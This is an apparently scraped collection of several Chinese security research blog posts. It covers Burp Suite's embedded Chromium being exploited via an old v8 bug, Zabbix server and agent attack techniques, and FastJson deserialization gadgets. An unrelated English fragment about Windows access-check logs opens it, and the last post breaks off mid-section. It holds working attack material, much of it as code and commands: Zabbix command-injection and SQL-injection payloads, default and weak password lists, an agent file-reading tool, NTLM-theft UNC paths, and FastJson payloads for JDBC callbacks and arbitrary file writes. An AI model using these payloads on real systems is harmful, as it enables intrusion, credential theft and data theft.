You should find an access_trace.etl file in your user's profile directory which will contain the logged events. There are various ways to read this file, the simplest is to use the Get-WinEvent command. As you need to do a bit of parsing of the contents of the log to get out various values I've put together a simple script do that. It's available on github here. Just run the script passing the name of the log file to convert the events into PowerShell objects.

PS> parse_access_check_log.ps1 "$env:USERPROFILE\access_trace.etl"
ProcessName        : ...\v1.0\powershell.exe
Mask               : MaximumAllowed
PackageSid         : S-1-15-2-1445519891-4232675966-...
Groups             : INSIDERDEV\user
Capabilities       : NAMED CAPABILITIES\Permissive Learning Mode
SecurityDescriptor : O:BAG:BAD:(A;OICI;KA;;;S-1-5-21-623841239-...

The log events don't seem to contain the name of the resource being opened, but it does contain the security descriptor and type of the object, what access mask was requested and basic information about the access token used. Hopefully this information is useful to someone.

反制爬虫之 Burp Suite 远程命令执行

By: Wfox
6 September 2021 at 05:14

一、前言

Headless Chrome是谷歌Chrome浏览器的无界面模式,通过命令行方式打开网页并渲染,常用于自动化测试、网站爬虫、网站截图、XSS检测等场景。

近几年许多桌面客户端应用中,基本都内嵌了Chromium用于业务场景使用,但由于开发不当、CEF版本不升级维护等诸多问题,攻击者可以利用这些缺陷攻击客户端应用以达到命令执行效果。

本文以知名渗透软件Burp Suite举例,从软件分析、漏洞挖掘、攻击面扩展等方面进行深入探讨。

二、软件分析

以Burp Suite Pro v2.0beta版本为例,要做漏洞挖掘首先要了解软件架构及功能点。

burpsuite_pro_v2.0.11beta.jar进行解包,可以发现Burp Suite打包了Windows、Linux、Mac的Chromium,可以兼容在不同系统下运行内置Chromium浏览器。

-w869

在Windows系统中,Burp Suite v2.0运行时会将chromium-win64.7z解压至C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\目录

从目录名及数字签名得知Burp Suite v2.0是直接引用JxBrowser浏览器控件,其打包的Chromium版本为64.0.3282.24。

那如何在Burp Suite中使用内置浏览器呢?在常见的使用场景中,Proxy -> HTTP history -> Response -> RenderRepeater -> Render都能够调用内置Chromium浏览器渲染网页。

当Burp Suite唤起内置浏览器browsercore32.exe打开网页时,browsercore32.exe会创建Renderer进程及GPU加速进程。

browsercore32.exe进程运行参数如下:

// Chromium主进程
C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\browsercore32.exe --port=53070 --pid=13208 --dpi-awareness=system-aware --crash-dump-dir=C:\Users\user\AppData\Local\JxBrowser --lang=zh-CN --no-sandbox --disable-xss-auditor --headless --disable-gpu --log-level=2 --proxy-server="socks://127.0.0.1:0" --disable-bundled-ppapi-flash --disable-plugins-discovery --disable-default-apps --disable-extensions --disable-prerender-local-predictor --disable-save-password-bubble --disable-sync --disk-cache-size=0 --incognito --media-cache-size=0 --no-events --disable-settings-window

// Renderer进程
C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\browsercore32.exe --type=renderer --log-level=2 --no-sandbox --disable-features=LoadingWithMojo,browser-side-navigation --disable-databases --disable-gpu-compositing --service-pipe-token=C06434E20AA8C9230D15FCDFE9C96993 --lang=zh-CN --crash-dump-dir="C:\Users\user\AppData\Local\JxBrowser" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --disable-accelerated-video-decode --service-request-channel-token=C06434E20AA8C9230D15FCDFE9C96993 --renderer-client-id=2 --mojo-platform-channel-handle=2564 /prefetch:1

从进程运行参数分析得知,Chromium进程以headless模式运行、关闭了沙箱功能、随机监听一个端口(用途未知)。

三、漏洞利用

Chromium组件的历史版本几乎都存在着1Day漏洞风险,特别是在客户端软件一般不会维护升级Chromium版本,且关闭沙箱功能,在没有沙箱防护的情况下漏洞可以无限制利用。

Burp Suite v2.0内置的Chromium版本为64.0.3282.24,该低版本Chromium受到多个历史漏洞影响,可以通过v8引擎漏洞执行shellcode从而获得PC权限。

以Render功能演示,利用v8漏洞触发shellcode打开计算器(此处感谢Sakura提供漏洞利用代码)

这个漏洞没有公开的CVE ID,但其详情可以在这里找到。
该漏洞的Root Cause是在进行Math.expm1的范围分析时,推断出的类型是Union(PlainNumber, NaN),忽略了Math.expm1(-0)会返回-0的情况,从而导致范围分析错误,导致JIT优化时,错误的将边界检查CheckBounds移除,造成了OOB漏洞。

用户在通过Render功能渲染页面时触发v8漏洞成功执行shellcode。

四、进阶攻击

Render功能需要用户交互才能触发漏洞,相对来说比较鸡肋,能不能0click触发漏洞?答案是可以的。

Burp Suite v2.0的Live audit from Proxy被动扫描功能在默认情况下开启JavaScript分析引擎(JavaScript analysis),用于扫描JavaScript漏洞。

其中JavaScript分析配置中,默认开启了动态分析功能(dynamic analysis techniques)、额外请求功能(Make requests for missing Javascript dependencies)

JavaScript动态分析功能会调用内置chromium浏览器对页面中的JavaScript进行DOM XSS扫描,同样会触发页面中的HTML渲染、JavaScript执行,从而触发v8漏洞执行shellcode。

额外请求功能当页面存在script标签引用外部JS时,除了页面正常渲染时请求加载script标签,还会额外发起请求加载外部JS。即两次请求加载外部JS文件,并且分别执行两次JavaScript动态分析。

额外发起的HTTP请求会存在明文特征,后端可以根据该特征在正常加载时返回正常JavaScript代码,额外加载时返回漏洞利用代码,从而可以实现在Burp Suite HTTP history中隐藏攻击行为。

GET /xxx.js HTTP/1.1
Host: www.xxx.com
Connection: close
Cookie: JSESSIONID=3B6FD6BC99B03A63966FC9CF4E8483FF

JavaScript动态分析 + 额外请求 + chromium漏洞组合利用效果:

Kapture 2021-09-06 at 2.14.35

五、流量特征检测

默认情况下Java发起HTTPS请求时协商的算法会受到JDK及操作系统版本影响,而Burp Suite自己实现了HTTPS请求库,其TLS握手协商的算法是固定的,结合JA3算法形成了TLS流量指纹特征可被检测,有关于JA3检测的知识点可学习《TLS Fingerprinting with JA3 and JA3S》。

Cloudflare开源并在CDN产品上应用了MITMEngine组件,通过TLS指纹识别可检测出恶意请求并拦截,其覆盖了大多数Burp Suite版本的JA3指纹从而实现检测拦截。这也可以解释为什么在渗透测试时使用Burp Suite请求无法获取到响应包。

以Burp Suite v2.0举例,实际测试在各个操作系统下,同样的jar包发起的JA3指纹是一样的。

-w672

不同版本Burp Suite支持的TLS算法不一样会导致JA3指纹不同,但同样的Burp Suite版本JA3指纹肯定是一样的。如果需要覆盖Burp Suite流量检测只需要将每个版本的JA3指纹识别覆盖即可检测Burp Suite攻击从而实现拦截。

本文章涉及内容仅限防御对抗、安全研究交流,请勿用于非法途径。

Zabbix 攻击面挖掘与利用

By: Wfox
17 August 2021 at 06:47

一、简介

Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。本议题介绍了Zabbix基础架构、Zabbix Server攻击面以及权限后利用,如何在复杂内网环境中从Agent控制Server权限、再基于Server拿下所有内网Agent。

二、Zabbix监控组件

Zabbix监控系统由以下几个组件部分构成:

1. Zabbix Server

Zabbix Server是所有配置、统计和操作数据的中央存储中心,也是Zabbix监控系统的告警中心。在监控的系统中出现任何异常,将被发出通知给管理员。

Zabbix Server的功能可分解成为三个不同的组件,分别为Zabbix Server服务、Web后台及数据库。

2. Zabbix Proxy

Zabbix Proxy是在大规模分布式监控场景中采用一种分担Zabbix Server压力的分层结构,其多用在跨机房、跨网络的环境中,Zabbix Proxy可以代替Zabbix Server收集性能和可用性数据,然后把数据汇报给Zabbix Server,并且在一定程度上分担了Zabbix Server的压力。

3. Zabbix Agent

Zabbix Agent部署在被监控的目标机器上,以主动监控本地资源和应用程序(硬盘、内存、处理器统计信息等)。

Zabbix Agent收集本地的状态信息并将数据上报给Zabbix Server用于进一步处理。

三、Zabbix网络架构

对于Zabbix Agent客户端来说,根据请求类型可分为被动模式及主动模式:

  • 被动模式:Server向Agent的10050端口获取监控项数据,Agent根据监控项收集本机数据并响应。
  • 主动模式:Agent主动请求Server(Proxy)的10051端口获取监控项列表,并根据监控项收集本机数据提交给Server(Proxy)

从网络部署架构上看,可分为Server-Client架构、Server-Proxy-Client架构、Master-Node-Client架构:

  • Server-Client架构

最为常见的Zabbix部署架构,Server与Agent同处于内网区域,Agent能够直接与Server通讯,不受跨区域限制。
-w879

  • Server-Proxy-Client架构

多数见于大规模监控需求的企业内网,其多用在跨机房、跨网络的环境,由于Agent无法直接与位于其他区域的Server通讯,需要由各区域Proxy代替收集Agent数据然后再上报Server。
-w1059

四、Zabbix Agent配置分析

从进程列表中可判断当前机器是否已运行zabbix_agentd服务,Linux进程名为zabbix_agentd,Windows进程名为zabbix_agentd.exe

Zabbix Agent服务的配置文件为zabbix_agentd.conf,Linux默认路径在/etc/zabbix/zabbix_agentd.conf,可通过以下命令查看agent配置文件并过滤掉注释内容:

cat /etc/zabbix/zabbix_agentd.conf | grep -v '^#' | grep -v '^$'

首先从配置文件定位zabbix_agentd服务的基本信息:

  • Server参数

Server或Proxy的IP、CIDR、域名等,Agent仅接受来自Server参数的IP请求。

Server=192.168.10.100
  • ServerActive参数

Server或Proxy的IP、CIDR、域名等,用于主动模式,Agent主动向ServerActive参数的IP发送请求。

ServerActive=192.168.10.100
  • StartAgents参数

为0时禁用被动模式,不监听10050端口。

StartAgents=0

经过对 zabbix_agentd.conf 配置文件各个参数的安全性研究,总结出以下配置不当可能导致安全风险的配置项:

  • EnableRemoteCommands参数

是否允许来自Zabbix Server的远程命令,开启后可通过Server下发shell脚本在Agent上执行。

风险样例:

EnableRemoteCommands=1
  • AllowRoot参数

Linux默认以低权限用户zabbix运行,开启后以root权限运行zabbix_agentd服务。

风险样例:

AllowRoot=1
  • UserParameter参数

自定义用户参数,格式为UserParameter=<key>,<command>,Server可向Agent执行预设的自定义参数命令以获取监控数据,以官方示例为例:

UserParameter=ping[*],echo $1

当Server向Agent执行ping[aaaa]指令时,$1为传参的值,Agent经过拼接之后执行的命令为echo aaaa,最终执行结果为aaaa

command存在命令拼接,但由于传参内容受UnsafeUserParameters参数限制,默认无法传参特殊符号,所以默认配置利用场景有限。

官方漏洞案例可参考CVE-2016-4338漏洞。

  • UnsafeUserParameters参数

自定义用户参数是否允许传参任意字符,默认不允许字符\ ' " ` * ? [ ] { } ~ $ ! & ; ( ) < > | # @

风险样例:

UnsafeUserParameters=1

当UnsafeUserParameters参数配置不当时,组合UserParameter自定义参数的传参命令拼接,可导致远程命令注入漏洞。

由Server向Agent下发指令执行自定义参数,即可在Agent上执行任意系统命令。
UserParameter=ping[*],echo $1 为例,向Agent执行指令ping[test && whoami],经过命令拼接后最终执行echo test && whoami,成功注入执行shell命令。

  • Include参数

加载配置文件目录单个文件或所有文件,通常包含的conf都是配置UserParameter自定义用户参数。

Include=/etc/zabbix/zabbix_agentd.d/*.conf

五、Zabbix Server攻击手法

除了有利用条件的Zabbix Agent漏洞外,默认情况下Agent受限于IP白名单限制,只处理来自Server的请求,所以攻击Zabbix Agent的首要途径就是先拿下Zabbix Server。

经过对Zabbix Server攻击面进行梳理,总结出部分攻击效果较好的漏洞:

1. Zabbix Web后台弱口令

Zabbix安装后自带Admin管理员用户和Guests访客用户(低版本),可登陆Zabbiax后台。

超级管理员默认账号:Admin,密码:zabbix
Guests用户,账号:guest,密码为空

2. MySQL弱口令

从用户习惯来看,运维在配置Zabbix时喜欢用弱口令作为MySQL密码,且搜索引擎的Zabbix配置教程基本用的都是弱口令,这导致实际环境中Zabbix Server的数据库密码通常为弱口令。

除了默认root用户无法外连之外,运维通常会新建MySQL用户 zabbix,根据用户习惯梳理了zabbix用户的常见密码:

123456
zabbix
zabbix123
zabbix1234
zabbix12345
zabbix123456

拿下MySQL数据库后,可解密users表的密码md5值,或者直接替换密码的md5为已知密码,即可登录Zabbix Web。

3. CVE-2020-11800 命令注入

Zabbix Server的trapper功能中active checks命令存在CVE-2020-11800命令注入漏洞,该漏洞为基于CVE-2017-2824的绕过利用。
未授权攻击者向Zabbix Server的10051端口发送trapper功能相关命令,利用漏洞即可在Zabbix Server上执行系统命令。

active checks是Agent主动检查时用于获取监控项列表的命令,Zabbix Server在开启自动注册的情况下,通过active checks命令请求获取一个不存在的host时,自动注册机制会将json请求中的host、ip添加到interface数据表里,其中CVE-2020-11800漏洞通过ipv6格式绕过ip字段检测注入执行shell命令,受数据表字段限制Payload长度只能为64个字符

{"request":"active checks","host":"vulhub","ip":"ffff:::;whoami"}

自动注册调用链:

active checks -> send_list_of_active_checks_json() -> get_hostid_by_host() -> DBregister_host()

command指令可以在未授权的情况下可指定主机(hostid)执行指定脚本(scriptid),Zabbix存在3个默认脚本,脚本中的{HOST.CONN}在脚本调用的时候会被替换成主机IP。

# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1

scriptid指定其中任意一个,hostid为注入恶意Payload后的主机id,但自动注册后的hostid是未知的,所以通过command指令遍历hostid的方式都执行一遍,最后成功触发命令注入漏洞。

{"request":"command","scriptid":1,"hostid":10001}

由于默认脚本的类型限制,脚本都是在Zabbix Server上运行,Zabbix Proxy是无法使用command指令的。payload长度受限制可拆分多次执行,必须更换host名称以执行新的payload。

漏洞靶场及利用脚本:Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

-w956

4. CVE-2017-2824 命令注入

上面小结已详细讲解,CVE-2017-2824与CVE-2020-11800漏洞点及利用区别不大,不再复述,可参考链接:https://talosintelligence.com/vulnerability_reports/TALOS-2017-0325

漏洞靶场及利用脚本:Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

5. CVE-2016-10134 SQL注入

CVE-2016-10134 SQL注入漏洞已知有两个注入点:

  • latest.php,需登录,可使用未关闭的Guest访客账号。
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

-w1192

  • jsrpc.php,无需登录即可利用。

利用脚本:https://github.com/RicterZ/zabbixPwn
-w676

漏洞靶场及利用脚本:zabbix latest.php SQL注入漏洞(CVE-2016-10134)

六、Zabbix Server权限后利用

拿下Zabbix Server权限只是阶段性的成功,接下来的问题是如何控制Zabbix Agent以达到最终攻击目的。

Zabbix Agent的10050端口仅处理来自Zabbix Server或Proxy的请求,所以后续攻击都是依赖于Zabbix Server权限进行扩展,本章节主要讲解基于监控项item功能的后利用。

在zabbix中,我们要监控的某一个指标,被称为“监控项”,就像我们的磁盘使用率,在zabbix中就可以被认为是一个“监控项”(item),如果要获取到“监控项”的相关信息,我们则要执行一个命令,但是我们不能直接调用命令,而是通过一个“别名”去调用命令,这个“命令别名”在zabbix中被称为“键”(key),所以在zabbix中,如果我们想要获取到一个“监控项”的值,则需要有对应的“键”,通过“键”能够调用相应的命令,获取到对应的监控信息。

以Zabbix 4.0版本为例,按照个人理解 item监控项可分为通用监控项、主动检查监控项、Windows监控项、自定义用户参数(UserParameter)监控项,Agent监控项较多不一一例举,可参考以下链接:
1. Zabbix Agent监控项
2. Zabbix Agent Windows监控项

在控制Zabbix Server权限的情况下可通过zabbix_get命令向Agent获取监控项数据,比如说获取Agent的系统内核信息:

zabbix_get -s 172.21.0.4 -p 10050 -k "system.uname"

-w643

结合上述知识点,针对item监控项的攻击面进行挖掘,总结出以下利用场景:

1. EnableRemoteCommands参数远程命令执行

Zabbix最为经典的命令执行利用姿势,许多人以为控制了Zabbix Server就肯定能在Agent上执行命令,其实不然,Agent远程执行系统命令需要在zabbix_agentd.conf配置文件中开启EnableRemoteCommands参数。

在Zabbix Web上添加脚本,“执行在”选项可根据需求选择,“执行在Zabbix服务器” 不需要开启EnableRemoteCommands参数,所以一般控制Zabbix Web后可通过该方式在Zabbix Server上执行命令拿到服务器权限。
-w669

如果要指定某个主机执行该脚本,可从Zabbix Web的“监测中 -> 最新数据”功能中根据过滤条件找到想要执行脚本的主机,单击主机名即可在对应Agent上执行脚本。

这里有个常见误区,如果类型是“执行在Zabbix服务器”,无论选择哪台主机执行脚本,最终都是执行在Zabbix Server上。

如果类型是“执行在Zabbix客户端”,Agent配置文件在未开启EnableRemoteCommands参数的情况下会返回报错。
-w1143

Agent配置文件在开启EnableRemoteCommands参数的情况下可成功下发执行系统命令。
-w873

如果不想在Zabbix Web上留下太多日志痕迹,或者想批量控制Agent,拿下Zabbix Server权限后可以通过zabbix_get命令向Agent执行监控项命令,在Zabbix Web执行脚本实际上等于执行system.run监控项命令

也可以基于Zabbix Server作为隧道跳板,在本地执行zabbix_get命令也能达到同样效果(Zabbix Agent为IP白名单校验)。

-w592

2. UserParameter自定义参数命令注入

之前介绍UserParameter参数的时候提到过,执行监控项时UserParameter参数command命令的$1、$2等会被替换成item传参值,存在命令注入的风险,但默认受UnsafeUserParameters参数限制无法传入特殊字符。

当Zabbiax Agent的zabbix_agentd.conf配置文件开启UnsafeUserParameters参数的情况下,传参值字符不受限制,只需要找到存在传参的自定义参数UserParameter,就能达到命令注入的效果。

举个简单案例,在zabbix_agentd.conf文件中添加自定义参数:

UserParameter=ping[*],echo $1

默认情况下UnsafeUserParameters被禁用,传入特殊字符将无法执行命令。
-w1190

zabbix_agentd.conf 文件中添加 UnsafeUserParameters=1,command经过传参拼接后成功注入系统命令。

zabbix_get -s 172.19.0.5 -p 10050 -k "ping[test && id]"

-w543

UnsafeUserParameters参数配置不当问题在监控规模较大的内网里比较常见,内网渗透时可以多留意Agent配置信息。

3. 任意文件读取

Zabbix Agent如果没有配置不当的问题,是否有其他姿势可以利用呢?答案是肯定的。

Zabbix原生监控项中,vfs.file.contents命令可以读取指定文件,但无法读取超过64KB的文件。

zabbix_get -s 172.19.0.5 -p 10050 -k "vfs.file.contents[/etc/passwd]"

-w644

zabbix_agentd服务默认以低权限用户zabbix运行,读取文件受zabbix用户权限限制。开启AllowRoot参数情况下zabbix_agentd服务会以root权限运行,利用vfs.file.contents命令就能任意文件读取。

如果文件超过64KB无法读取,在了解该文件字段格式的情况下可利用vfs.file.regexp命令正则获取关键内容。

4. Windows目录遍历

Zabbix原生监控项中,wmi.get命令可以执行WMI查询并返回第一个对象,通过WQL语句可以查询许多机器信息,以下例举几种利用场景:

  • 遍历盘符

由于wmi.get命令每次只能返回一行数据,所以需要利用WQL的条件语句排除法逐行获取数据。

比如WQL查询盘符时,只返回了C:

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM Win32_LogicalDisk\"]"

通过追加条件语句排除已经查询处理的结果,从而获取下一行数据。

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM Win32_LogicalDisk WHERE Name!='C:'\"]"

可通过脚本一直追加条件语句进行查询,直至出现Cannot obtain WMI information.代表WQL已经无法查询出结果。从图中可以看到通过wmi.get命令查询出了该机器上存在C:、D:盘符。

-w1143

  • 遍历目录

获取C:下的目录,采用条件语句排除法逐行获取。

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' \"]"

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' AND Caption != 'C:\\\\\$Recycle.Bin' \"]"

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' AND Caption != 'C:\\\\\$Recycle.Bin' AND Caption != 'C:\\\\\$WinREAgent' \"]"

...

-w879

获取C:下的文件,采用条件语句排除法逐行获取。

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' \"]"

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' AND Name != 'C:\\\\\$WINRE_BACKUP_PARTITION.MARKER' \"]"

zabbix_get -s 192.168.98.2 -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' AND Name != 'C:\\\\\$WINRE_BACKUP_PARTITION.MARKER' AND Name !='C:\\\\browser.exe' \"]"

...

-w947

利用wmi.get命令进行目录遍历、文件遍历,结合vfs.file.contents命令就能够在Windows下实现任意文件读取。

基于zabbix_get命令写了个python脚本,实现Windows的列目录、读文件功能。

import os
import sys

count = 0

def zabbix_exec(ip, command):
    global count
    count = count + 1
    check = os.popen("./zabbix_get -s " + ip + " -k \"" + command + "\"").read()
    if "Cannot obtain WMI information" not in check:
        return check.strip()
    else:
        return False

def getpath(path):
    return path.replace("\\","\\\\\\\\").replace("$","\\$")

def GetDisk(ip):
    where = ""
    while(True):
        check_disk = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM Win32_LogicalDisk WHERE Name != '' " + where + "\\\"]")
        if check_disk:
            print(check_disk)
            where = where + "AND Name != '" + check_disk+ "'"
        else:
            break

def GetDirs(ip, dir):
    drive = dir[0:2]
    path = dir[2:]

    where = ""
    while(True):
        check_dir = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Caption FROM Win32_Directory WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]")
        if check_dir:
            print(check_dir)
            where = where + "AND Caption != '" + getpath(check_dir) + "'"
        else:
            break

def GetFiles(ip, dir):
    drive = dir[0:2]
    path = dir[2:]

    where = ""
    while(True):
        check_file = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM CIM_DataFile WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]")
        if check_file:
            if "Invalid item key format" in check_file:
                continue
            print(check_file)
            where = where + "AND Name != '" + getpath(check_file) + "'"
        else:
            break

def Readfile(ip, file):
    read = zabbix_exec(ip, "vfs.file.contents[" + file + "]")
    print(read)

if __name__ == "__main__":
    if len(sys.argv) == 2:
        GetDisk(sys.argv[1])
    elif sys.argv[2][-1] != "\\":
        Readfile(sys.argv[1], sys.argv[2])
    else:
        GetDirs(sys.argv[1],sys.argv[2])
        GetFiles(sys.argv[1],sys.argv[2])
    
    print("Request count: " + str(count))

5. Windows UNC路径利用

在Windows Zabbix Agent环境中,可以利用vfs.file.contents命令读取UNC路径,窃取Zabbix Agent机器的Net-NTLM hash,从而进一步Net-NTLM relay攻击。

Window Zabbix Agent默认安装成Windows服务,运行在SYSTEM权限下。在工作组环境中,system用户的Net-NTLM hash为空,所以工作组环境无法利用。

在域内环境中,SYSTEM用户即机器用户,如果是Net-NTLM v1的情况下,可以利用Responder工具获取Net-NTLM v1 hash并通过算法缺陷解密拿到NTLM hash,配合资源约束委派获取域内机器用户权限,从而拿下Agent机器权限。

也可以配合CVE-2019-1040漏洞,relay到ldap上配置基于资源的约束委派进而拿下Agent机器权限。

zabbix_get -s 192.168.30.200 -p 10050 -k "vfs.file.contents[\\\\192.168.30.243\\cc]"

-w746

-w1917

6. Zabbix Proxy和主动检查模式利用场景

通过zabbix_get工具执行监控项命令只适合Agent被动模式且10050端口可以通讯的场景(同时zabbix_get命令也是为了演示漏洞方便)。

如果在Zabbix Proxy场景或Agent主动检查模式的情况下,Zabbix Server无法直接与Agent 10050端口通讯,可以使用比较通用的办法,就是通过Zabbix Web添加监控项。

以UserParameter命令注入漏洞举例,给指定主机添加监控项,键值中填入监控项命令,信息类型选择文本:
-w795

在最新数据中按照筛选条件找到指定主机,等待片刻就能看到执行结果。
-w1072

任意文件读取漏洞也同理:
-w783

-w701

通过zabbix_get工具执行结果最大可返回512KB的数据,执行结果存储在MySQL上的限制最大为64KB。

ps: 添加的监控项会一直定时执行,所以执行完后记得删除监控项。

七、参考链接

https://www.zabbix.com/documentation/4.0/zh/manual/config/items/userparameters
https://github.com/vulhub/vulhub
https://talosintelligence.com/vulnerability_reports/TALOS-2017-0325
https://www.zsythink.net/archives/551/

Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用

By: Skay
17 August 2021 at 05:11

FastJson反序列化0day及在区块链应用中的后渗透利用

链接:https://www.blackhat.com/us-21/briefings/schedule/#how-i-used-a-json-deserialization-day-to-steal-your-money-on-the-blockchain-22815

PPT链接:http://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

一、Fastjson反序列化原理

这个图其实已经能让人大致理解了,更详细的分析移步
Fastjson反序列化原理

image

二、byPass checkAutotype

关于CheckAutoType相关安全机制简单理解移步

https://kumamon.fun/FastJson-checkAutoType/

以及 https://mp.weixin.qq.com/s/OvRyrWFZLGu3bAYhOPR4KA

https://www.anquanke.com/post/id/225439

https://mp.weixin.qq.com/s/OvRyrWFZLGu3bAYhOPR4KA

一句话总结checkAutoType(String typeName, Class<?> expectClass, int features) 方法的 typeName 实现或继承自 expectClass,就会通过检验

2

三、议题中使用的Fastjson 的一些已公开Gadgets

  • 必须继承 auto closeable。
  • 必须具有默认构造函数或带符号的构造函数,否则无法正确实例化。
  • 不在黑名单中
  • 可以引起 rce 、任意文件读写或其他高风险影响
  • gadget的依赖应该在原生jdk或者广泛使用的第三方库中

Gadget自动化寻找

ggg

https://gist.github.com/5z1punch/6bb00644ce6bea327f42cf72bc620b80

3

关于这几条链我们简单复现下

1.Mysql JDBC

搭配使用 https://github.com/fnmsd/MySQL_Fake_Server

import com.alibaba.fastjson.JSON;

public class Payload_test {
    public static void main(String[] args){

        //搭配使用 https://github.com/fnmsd/MySQL_Fake_Server
        String payload_mysqljdbc = "{\"aaa\":{\"@type\":\"\\u006a\\u0061\\u0076\\u0061.lang.AutoCloseable\", \"@type\":\"\\u0063\\u006f\\u006d.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"192.168.33.128\",\"portToConnectTo\":3306,\"url\":\"jdbc:mysql://192.168.33.128:3306/test?detectCustomCollations=true&autoDeserialize=true&user=\",\"databaseToConnectTo\":\"test\",\"info\":{\"@type\":\"\\u006a\\u0061\\u0076\\u0061.util.Properties\",\"PORT\":\"3306\",\"statementInterceptors\":\"\\u0063\\u006f\\u006d.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\",\"user\":\"cb\",\"PORT.1\":\"3306\",\"HOST.1\":\"172.20.64.40\",\"NUM_HOSTS\":\"1\",\"HOST\":\"172.20.64.40\",\"DBNAME\":\"test\"}}\n" + "}";

        JSON.parse(payload_mysqljdbc);

        JSON.parseObject(payload_mysqljdbc);
    }
}
3

更多版本详情参考 https://mp.weixin.qq.com/s/BRBcRtsg2PDGeSCbHKc0fg

2.commons-io写文件

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

2.1 commons-io 2.0 - 2.6

 String aaa_8192 = "ssssssssssssss"+Some_Functions.getRandomString(8192);
//        String write_name = "C://Windows//Temp//sss.txt";
String write_name = "D://tmp//sss.txt";
String payload_commons_io_filewrite_0_6 = "{\"x\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"input\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\"reader\":{\"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\"charSequence\":{\"@type\":\"java.lang.String\"\""+aaa_8192+"\"},\"charsetName\":\"UTF-8\",\"bufferSize\":1024},\"branch\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\"writer\":{\"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\"file\":\""+write_name+"\",\"encoding\":\"UTF-8\",\"append\": false},\"charsetName\":\"UTF-8\",\"bufferSize\": 1024,\"writeImmediately\": true},\"trigger\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"is\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger2\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"is\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger3\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"is\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"}}}";
4

此处在Linux复现时,或者其它环境根据操作系统及进程环境不同fastjson构造函数的调用会出现随机化,在原Poc基础上修改如下即可

5

2.1 commons-io 2.7.0 - 2.8.0

